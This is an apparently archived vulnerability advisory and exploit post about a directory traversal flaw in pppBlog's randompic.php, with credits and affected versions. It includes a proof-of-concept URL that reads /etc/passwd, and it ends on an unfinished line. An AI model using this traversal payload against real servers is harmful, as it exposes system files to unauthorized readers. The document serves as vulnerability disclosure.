[原文]Directory traversal vulnerability in randompic.php in pppBLOG 0.3.8 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) sequence in an index of the "file" array parameter, as demonstrated by file.
# pppBlog <= 0.3.11 (randompic.php) System File Disclosure Vulnerability
# url: http://sourceforge.net/projects/pppblog/
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
# In memory of rgod ;)
*Requeriments: register_globals = On
vulnerable code in randompic.php at lines 66-72:
poc = randompic.php?files=[file]
poc = randompic.php?files=../../../../../../../../../../etc/passwd
linked: http://milw0rm.com/exploits/1853 (pppBlog 0.3.8, thanks rgod).
tested on localhost with register_globals = On.
# milw0rm.com [2008-11-03]
rgod is credited with the discovery of this vulnerability.
pppBLOG pppBLOG 0.3.11
pppBLOG pppBLOG 0.3.8
pppBlog is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the affected application. Information obtained may aid the attacker in further attacks.
This vulnerability may be exploited via a browser.
The following exploit and example URIs are available: